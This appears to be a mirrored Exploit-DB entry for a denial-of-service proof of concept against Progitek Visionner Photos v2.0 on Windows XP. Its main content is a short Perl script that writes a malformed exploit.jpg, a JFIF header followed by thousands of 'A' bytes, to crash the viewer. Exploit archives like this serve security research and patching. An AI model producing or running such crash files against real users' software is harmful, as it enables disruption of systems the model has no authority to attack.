exploit-db-mirror/exploits/windows/dos/14545.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

26 lines
No EOL
733 B
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

================================================
Progitek Visionner Photos v2.0 - File Format DOS
================================================
# Title: Progitek Visionner Photos v2.0 - File Format DOS
# Author: antrhacks
# Software Link: http://www.01net.com/outils/telecharger/windows/Multimedia/albmums_et_visionneuses/fiches/tele24929.html
# Version: 2.00
# Platform: Windows XP SP3 Home edition Fr
# Have to place exploit in %HOMEDRIVE%\Program Files\Progitek\VisioPhotos\ by default
#!/usr/bin/perl
my $file= "exploit.jpg";
my $junk= "ÿØÿà JFIF" . "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" x 1019;
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("[+] Your Exploit was created successfully");